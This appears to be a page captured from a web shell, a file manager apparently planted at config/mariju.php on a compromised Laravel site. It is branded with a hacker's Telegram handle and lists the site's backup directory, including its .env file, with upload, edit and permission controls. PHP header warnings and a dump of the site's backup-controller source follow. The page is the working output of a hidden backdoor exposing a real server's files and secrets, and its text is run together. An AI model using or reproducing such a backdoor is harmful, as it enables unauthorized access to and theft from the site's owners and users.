telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log15224633 KBJuly 18 2025 16:55:340644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
commonUtil = $commonUtil; } /** * Display a listing of the resource. * * @return \Illuminate\Http\Response */ public function index() { if (! auth()->user()->can('backup')) { abort(403, 'Unauthorized action.'); } $disk = Storage::disk(config('backup.backup.destination.disks')[0]); $files = $disk->files(config('backup.backup.name')); $backups = []; // make an array of backup files, with their filesize and creation date foreach ($files as $k => $f) { // only take the zip files into account if (substr($f, -4) == '.zip' && $disk->exists($f)) { $backups[] = [ 'file_path' => $f, 'file_name' => str_replace(str_replace('\\', '/', config('backup.backup.name')).'/', '', $f), 'file_size' => $disk->size($f), 'last_modified' => $disk->lastModified($f), ]; } } // reverse the backups, so the newest one would be on top $backups = array_reverse($backups); $cron_job_command = $this->commonUtil->getCronJobCommand(); // $backup_clean_cron_job_command = $this->commonUtil->getBackupCleanCronJobCommand(); return view('backup.index') ->with(compact('backups', 'cron_job_command')); } /** * Create a resource. * * @return \Illuminate\Http\Response */ public function create() { if (! auth()->user()->can('backup')) { abort(403, 'Unauthorized action.'); } try { //Disable in demo $notAllowed = $this->commonUtil->notAllowedInDemo(); if (! empty($notAllowed)) { return $notAllowed; } // start the backup process Artisan::call('backup:run'); $output = Artisan::output(); // log the results Log::info("Backpack\BackupManager -- new backup started from admin interface \r\n".$output); $output = ['success' => 1, 'msg' => __('lang_v1.success'), ]; } catch (Exception $e) { $output = ['success' => 0, 'msg' => $e->getMessage(), ]; } return back()->with('status', $output); } /** * Downloads a backup zip file. * * TODO: make it work no matter the flysystem driver (S3 Bucket, etc). */ public function download($file_name) { if (! auth()->user()->can('backup')) { abort(403, 'Unauthorized action.'); } //Disable in demo if (config('app.env') == 'demo') { $output = ['success' => 0, 'msg' => 'Feature disabled in demo!!', ]; return back()->with('status', $output); } $file = config('backup.backup.name').'/'.$file_name; $disk = Storage::disk(config('backup.backup.destination.disks')[0]); if ($disk->exists($file)) { $fs = Storage::disk(config('backup.backup.destination.disks')[0])->getDriver(); $stream = $fs->readStream($file); //var_dump($fs->size($file));exit; return \Response::stream(function () use ($stream) { fpassthru($stream); }, 200, [ 'Content-Type' => $fs->mimeType($file), //'Content-Length' => $fs->getSize($file), 'Content-disposition' => 'attachment; filename="'.basename($file).'"', ]); } else { abort(404, "The backup file doesn't exist."); } } /** * Deletes a backup file. */ public function delete($file_name) { if (! auth()->user()->can('backup')) { abort(403, 'Unauthorized action.'); } //Disable in demo if (config('app.env') == 'demo') { $output = ['success' => 0, 'msg' => 'Feature disabled in demo!!', ]; return back()->with('status', $output); } $disk = Storage::disk(config('backup.backup.destination.disks')[0]); if ($disk->exists(config('backup.backup.name').'/'.$file_name)) { $disk->delete(config('backup.backup.name').'/'.$file_name); return redirect()->back(); } else { abort(404, "The backup file doesn't exist."); } } }